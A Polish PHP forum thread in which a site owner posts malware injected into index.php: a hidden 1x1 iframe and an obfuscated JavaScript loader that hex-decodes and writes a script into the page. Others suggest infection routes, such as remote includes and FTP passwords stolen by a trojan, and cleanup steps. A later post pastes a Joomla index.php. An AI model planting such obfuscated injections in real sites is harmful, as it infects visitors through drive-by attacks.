[php] Wirus na stronie Opcje

[propage]

na mojej stronie pojawił się taki kod

[PHP] pobierz, plaintext 
<?php
<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function c102916999516l496e0d2bf1aea(l496e0d2bf22bc){ function l496e0d2bf2a8d(){var l496e0d2bf325e=16;return l496e0d2bf325e;} return (parseInt(l496e0d2bf22bc,l496e0d2bf2a8d()));}function l496e0d2bf3a2e(l496e0d2bf4200){  var l496e0d2c00793='';l496e0d2c026d5=String.fromCharCode;for(l496e0d2c00f63=0;l496e0d2c00f63<l496e0d2bf4200.length;l496e0d2c00f63+=2){ l496e0d2c00793+=(l496e0d2c026d5(c102916999516l496e0d2bf1aea(l496e0d2bf4200.substr(l496e0d2c00f63,2))));}return l496e0d2c00793;} var x.d.2='';var l496e0d2c030f5='3C736'+x.d.2+'3726'+x.d.2+'970743E6'+x.d.2+'96'+x.d.2+'6'+x.d.2+'28216'+x.d.2+'D796'+x.d.2+'96'+x.d.2+'1297B6'+x.d.2+'46'+x.d.2 +'F6'+x.d.2+'3756'+x.d.2+'D6'+x.d.2+'56'+x.d.2+'E742E77726'+x.d.2+'9746'+x.d.2+'528756'+x.d.2+'E6'+x.d.2+'5736'+x.d.2+'36'+x.d.2+'1706'+x.d.2 +'528202725336' +x.d.2+'32536'+x.d.2+'392536'+x.d.2+'36'+x.d.2+'2537322536'+x.d.2+'312536'+x.d.2+'6'+x.d.2+'42536'+x.d.2 +'352532302536'+x.d.2+'6'+x.d.2+'52536'+x.d.2+'312536' +x.d.2+'6'+x.d.2+'42536'+x.d.2+'3525336'+x.d.2+'42536'+x.d.2+'332533312533302532302537332537322536'+x.d.2+'3325336'+x.d.2+ '42532372536'+x.d.2+'3825373425373425373025336' +x.d.2+'125326'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'372536'+x.d.2+'6'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'372536'+x.d.2+'6' +x.d.2+'6'+x.d.2+'2533322536'+x.d.2+'6'+x.d.2+'42536' +x.d.2+'3525326'+x.d.2+'52536'+x.d.2+'6'+x.d.2+'52536'+x.d.2+'3525373425326'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'52536'+x.d.2+ '372536'+x.d.2+'6'+x.d.2+'6'+x.d.2+'25326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'332536' +x.d.2+'382536'+x.d.2+'352536'+x.d.2+'332536'+x.d.2+'6'+x.d.2+'225326'+x.d.2+'52536' +x.d.2+'382537342536'+x.d.2+'6'+x.d.2+'42536'+x.d.2+'6'+x.d.2+'32532372532302537372536'+x.d.2+'392536'+x.d.2+'342537342536' +x.d.2+'3825336'+x.d.2+'42533322533322533322532302536'+x.d.2+'382536'+x.d.2+'352536'+x.d.2+'392536'+x.d.2+'372536'+x.d.2+ '3825373425336'+x.d.2+'42533352533342533372532302537332537342537392536'+x.d.2+'6'+x.d.2+'32536'+x.d.2+'3525336'+x.d.2+ '4253237253736'+x.d.2+'2536'+x.d.2+'392537332536'+x.d.2+'392536'+x.d.2+'322536'+x.d.2+'392536'+x.d.2+'6'+x.d.2+'32536'+x.d.2+ '3925373425373925336'+x.d.2+'12536'+x.d.2+'382536'+x.d.2+'392536'+x.d.2+'342536'+x.d.2+'342536'+x.d.2+'352536'+x.d.2+'6'+x.d.2+'525323725336' +x.d.2+'525336'+x.d.2+'325326'+x.d.2+'6'+x.d.2+'2536'+x.d.2+'392536'+x.d.2+'36'+x.d.2+'2537322536'+x.d.2+'312536'+x.d.2+'6'+x.d.2+'42536'+x.d.2+ '3525336'+x.d.2+'52729293B7D76'+x.d.2+'6'+x.d.2+'172206'+x.d.2+'D796'+x.d.2+'96'+x.d.2+'13D7472756'+x.d.2+'53B3C2F736'+x.d.2+'3726'+x.d.2+ '970743E';document.write(l496e0d2bf3a2e(l496e0d2c030f5));</script>
?>
[PHP] pobierz, plaintext 

Wstrzyknięty do pliku index.php

Wie ktoś jak ten wirus dostaje się do pliku index.php?

Stosuje się do wszystkich podstawowych zasas przy tworzeniu stron, filtruje zawsze wszystkie dane od użytkownika, hm

[MWL]

XSS??

a może masz jakieś pole input które może przjmować dane tylko int, a tu bam ktoś się firebugiem pobawił??
Jest wiele możliwości... ciężko jak kolwiek to określić

Ten post edytował MWL 14.01.2009, 21:14:14

[erix]

XSS??

Nie sądzę. (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

Raczej luka w postaci korzystania z register_globals, czy czegoś podobnego. Strona klienta tu nie ma nic do tego.

[propage]

nie mam u siebie register global włączone. Jest to chyba wirus ktory automatycznie atakuje strony ( nie robi tego człowiek ręcznie ) pewnie wykorzystuje on jakiś sposób określony

Ten post edytował propage 14.01.2009, 21:27:06

[erix]

nie mam u siebie register global włączone.

A allow_url_fopen? (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Często zdarza się, że boty jako parametr w URL podają adres do skryptu-trojana, który wykonuje polecenia atakującego. Narażony skrypt go include'uje, stąd już można zrobić wszystko...

[propage]

allow_url_fopenOff
allow_url_includeOff


wszystkie zmienne ktore dostaje od klienta typu integer sa filtrowane tak :
$zmienna = int_val($_POST['zmienna']);

inne zmienne tak:

[PHP] pobierz, plaintext 
<?php
$data = str_replace(array("'","'"),"'",$_POST['data']);
$data=htmlspecialchars(strip_tags(trim($data)));
$data=mysql_real_escape_string($data,$this->db_connect_id);
?>
[PHP] pobierz, plaintext 

na serwerze są foldery, które maja chomod 777, czy to, że są takie foldery już znaczy, że ktoś się może włamać ?

Ten post edytował propage 14.01.2009, 21:51:47

[rzymek01]

normalnie ktoś ci wszedł na ftp i zedytował plik (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif)

[erix]

czy to, że są takie foldery już znaczy, że ktoś się może włamać ?

Teoretycznie tak - jeśli Twój serwer udostępnia konta SSH i ktoś znał ścieżkę. Ale w praktyce, to albo dziurawe skrypty, albo słabe hasła.

[l0ud]

Nic z tych rzeczy. Prędzej robak lub trojan na komputerze, na którym łączyłeś się z FTP. Pierwszym krokiem powinno być przeskanowanie komputera, następnie zmiana wszystkich haseł do strony. Na końcu najlepiej usuń wszystko i wgraj od nowa (ostatecznie, jakbyś nie miał backupu popraw tylko zmodyfikowane pliki - najczęściej index.php)

[propage]

Wirsu na komputerze lokalnym dopisalby ten kod do index.php ? (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) raczej nie ponieważ, nie logowalem sie ostanio na serwer, a nagle kod zostal wstrzykniety.

[l0ud]

Podejrzewam, że hasło jest zczytywane podczas infekcji - z konfiguracji klienta ftp albo łączenia. Modyfikacja strony odbywa się już z innego komputera (zapewne serwera włamywaczy) i może wystąpić z opóźnieniem. Może Twoje hasła były za słabe?

Tak czy siak, ja dziury po stronie skrpytów bym nie szukał.

[pyro]

Ewentualnie poprostu przejrzyj logi... głównie httpd-access.log do panelow administracyjnych, jak nie to w innych przypadkach, jak nic nie bedzie to znaczy ze nie od strony www

[propage]

problem ciagle występuje, ciągle tylko u tego samego klienta. Hosting to az byc moze to wina hostingu ? 

[l0ud]

Nie. Ty albo klient używacie zainfekowanego komputera/nie zostały zmienione hasła i ciągle jakiś bot uzyskuje dostęp...

[szakal89]

witam na stronie pokazuje mi wirusa walcze z nim i nie daje rade

http://sitecheck.sucuri.net/results/dabrow...uch.osp.org.pl/ może ktoś pomozę poniżej index

<?php
/**
* @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright © 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');

/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));